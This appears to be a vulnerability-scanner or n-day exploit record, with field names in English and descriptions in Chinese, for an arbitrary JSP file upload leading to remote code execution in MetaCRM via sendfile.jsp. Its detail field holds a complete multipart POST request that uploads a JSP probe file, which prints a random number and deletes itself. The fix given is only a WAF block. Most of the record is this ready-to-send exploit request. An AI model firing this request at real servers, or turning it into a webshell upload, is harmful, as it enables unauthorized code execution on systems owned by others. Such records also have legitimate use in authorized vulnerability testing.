vendor = "MetaCRM"
name = "MetaCRM 客户关系管理系统 sendfile.jsp 任意文件上传"
type = "RCE"
version = "未知"
path = "/business/common/importdata/sendfile.jsp"
detail = "POST /business/common/importdata/sendfile.jsp HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundary03rNBzFMIytvpW22 ------WebKitFormBoundary03rNBzFMIytvpW22 Content-Disposition: form-data; name=\"file\"; filename=\"1.jsp\" <%out.println(new java.util.Random().nextInt(100));new java.io.File(application.getRealPath(request.getServletPath())).delete();%> ------WebKitFormBoundary03rNBzFMIytvpW22--"
fix = "使用WAF封禁该地址"
date = "0701"
label = "nday"
verifier = "AdySec"
